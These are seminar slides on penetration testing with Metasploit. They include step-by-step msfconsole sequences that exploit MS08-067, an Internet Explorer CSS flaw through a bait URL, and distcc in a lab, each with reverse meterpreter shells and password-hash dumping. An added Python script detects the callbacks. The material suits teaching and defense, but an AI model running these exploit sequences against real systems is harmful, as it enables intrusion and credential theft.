pentest with metasploit
penetration testing with metasploit
Presented by Syarif
Seminar IT Security: Safe The System
Sumedang, April 29 2012, STMIK Sumedang
Agenda
• Why & What’s Penetration Testing (Pentest)
• << back|track Overview
• Metasploit Basics & Meterpreter
• DEMO :)
Whoami
• geek & Pentester
• infosec trouble maker
• InfoSec enthusiast
• CyberCrime investigator
• Lecturer & Engineer
Why Pentest ?
• Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1)
• Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
What’s Penetration Testing
• A method to evaluate the security of a computer system / network
• Practice (attacking) an IT system the way a ‘hacker’ does
• Find security holes (weaknesses)
• Bypass security mechanisms
• Compromise an organization’s IT system security
Must have permission from the IT system owner!
Illegal activity puts you in jail
Ethics
• Think before act
• Don’t be stupid
• Don’t be malicious
Pentest Phases
• Vulnerability Analysis
• Information Gathering
• Exploitation
• Post Exploitation
• Reporting
<< back|track overview
• Let’s Watch the Video :)
<< back|track overview
The Most Advanced Linux Security Distribution
Open Source & Always be
Developed for Security Professional
Real World Pentesting Tools
What’s Metasploit
• Not just a tool, but an entire framework *1)
• An open source platform for writing security tools and exploits *2)
• Easily build attack vectors to add its exploits, payloads, encoders,
• Create and execute more advanced attacks
• Ruby-based
Metasploit interfaces
• MSFconsole
• MSFcli
• msfweb, msfgui ( discontinued )
• Metasploit Pro, Metasploit Express
• Armitage
Metasploit Terminology
• Exploit : code that allows a pentester to take advantage of a flaw within a system, application, or service *1)
• Payload : code that we want the target system to execute (a few commands to be run on the target system) *1)
• Shellcode : a set of instructions used as the payload when exploitation occurs *1)
• Module : a piece of software that can be used by Metasploit *1)
• Listener : a component that waits for an incoming connection *1)
How does exploitation work (diagram: attacker, vulnerable server)
• 1. The attacker sends the exploit + payload to the vulnerable server
• 2. The exploit runs, then the payload runs
• 3. Upload / download data
Traditional Pentest Vs Metasploit
Traditional Pentest
• Public exploit gathering
• Change offsets
• Replace shellcode
Metasploit for Pentest
• Load Metasploit
• Choose the target OS
• Use exploit
• Set payload
• Execute
Meterpreter
• Used as a payload after a vulnerability is exploited *1)
• Improves post exploitation
Meterpreter (diagram)
• Exploit a vulnerability
• Select meterpreter as the payload
• Get a meterpreter shell
Meterpreter commands (screenshots)
Pentest Scenario
Attacker against vulnerable OSes running on VMware (* : Ubuntu 8.04 Metasploitable)
OS in the Lab
• BackTrack 5 R2, IP address : 172.16.240.143
• Windows XP SP2, IP address : 172.16.240.129
• Windows 2003 Server, IP address : 172.16.240.141
• Windows 7, IP address : 172.16.240.142
• Ubuntu Linux 8.04 (Metasploitable) *, IP address : 172.16.240.144
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
Windows XP Post Exploitation
• msf exploit(ms08_067_netapi) > sessions -i 1
• meterpreter > getsystem -h
• meterpreter > getuid
• meterpreter > hashdump
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.141
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim opens the URL http://172.16.240.143:80/miyabi-naked.avi
Windows 7 Exploitation
• msf exploit(ms11_003_ie_css_import) > sessions -l
• msf exploit(ms11_003_ie_css_import) > sessions -i 1
• meterpreter > sysinfo
• meterpreter > shell
Ubuntu 8.04 Metasploitable Exploitation
• search distcc
• use exploit/unix/misc/distcc_exec
• show payloads
• set PAYLOAD cmd/unix/reverse
• show options
• set rhost 172.16.240.144
• set lhost 172.16.240.143
• exploit
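Every scenario above uses a reverse payload: once the exploit runs, the victim opens a TCP connection back to the attacker's listener (LHOST 172.16.240.143, LPORT 4444 by default, 443 in the Windows 7 case). As an added example that is not part of the slides, the following Python check scans a constructed connection log for exactly those callbacks; the log format, the sample lines and the function names are assumptions.

```python
# Added example (not from the slides): flag reverse payload callbacks in a
# constructed connection log. A server or workstation that initiates a TCP
# connection to a peer inside the same subnet on the listener port is the
# signal a defender can alert on; the attacker's own inbound SYN to port 445
# (exploit delivery) is deliberately not counted.
import re
from collections import defaultdict

LISTENER_HOST = "172.16.240.143"   # attacker LHOST from the lab scenario
LISTENER_PORTS = {4444, 443}       # Metasploit default LPORT and the Windows 7 LPORT

# Assumed log format: "<time> TCP <src>:<sport> -> <dst>:<dport> <flags>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) TCP (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<flags>\S+)$")

# Constructed sample log covering the XP, Windows 7 and Metasploitable cases.
SAMPLE_LOG = """\
2012-04-29T10:14:58 TCP 172.16.240.143:51002 -> 172.16.240.129:445 SYN
2012-04-29T10:15:01 TCP 172.16.240.129:1045 -> 172.16.240.143:4444 SYN
2012-04-29T10:16:10 TCP 172.16.240.142:49210 -> 172.16.240.143:80 SYN
2012-04-29T10:16:12 TCP 172.16.240.142:49211 -> 172.16.240.143:443 SYN
2012-04-29T10:17:30 TCP 172.16.240.142:49215 -> 10.0.0.5:443 SYN
2012-04-29T10:18:02 TCP 172.16.240.144:38800 -> 172.16.240.143:4444 SYN
"""

def parse(log_text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
            yield rec

def find_callbacks(log_text, listener=LISTENER_HOST, ports=LISTENER_PORTS):
    """Return {victim_ip: sorted listener ports it connected to}.
    Only outbound SYNs whose destination is the listener on a listener port
    count, so ordinary HTTPS to other hosts (10.0.0.5:443) is ignored."""
    hits = defaultdict(set)
    for rec in parse(log_text):
        if rec["flags"] == "SYN" and rec["dst"] == listener and rec["dport"] in ports:
            hits[rec["src"]].add(rec["dport"])
    return {ip: sorted(p) for ip, p in hits.items()}

if __name__ == "__main__":
    for ip, ports in sorted(find_callbacks(SAMPLE_LOG).items()):
        print(f"possible reverse payload callback: {ip} -> {LISTENER_HOST} ports {ports}")
```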
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
References
1. Metasploit: The Penetration Tester’s Guide, David Kennedy, Jim O’Gorman, Devon Kearns, Mati Aharoni
2. http://www.metasploit.com
3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines